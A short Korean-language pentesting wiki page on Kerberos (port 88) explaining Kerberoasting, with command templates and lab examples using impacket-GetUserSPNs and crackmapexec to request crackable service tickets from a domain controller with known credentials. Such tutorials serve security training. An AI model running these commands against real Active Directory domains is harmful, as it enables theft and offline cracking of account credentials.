88 - Kerberos

커버로스 프로토콜이 실행중인 곳에서 유저 계정 정보를 획득하거나 AS-REP-Roasting 공격에 취약한 계정을 발견했다면, 도메인 내에 등록된 SPN 목록 혹은 등록된 계정 이름을 통해서 발급 가능한 ST를 획득할 수 있습니다.

# 명령어 양식
impacket-GetUserSPNs <Domain/USER:PASS> -request -dc-ip <DC-IP>

# 실습
impacket-GetUserSPNs pentesting.wiki/wiki:password123! -request -dc-ip 10.0.2.10

# 명령어 양식
crackmapexec ldap <IP> -u <USER> -p <PASS> --kerberoasting kerberoas.txt

# 실습
crackmapexec ldap 10.0.2.10 -u wiki -p password123! --kerberoasting kerberoas.txt

Previous80/443 - HTTP Next111 - RPC

Last updated 1 month ago

Was this helpful?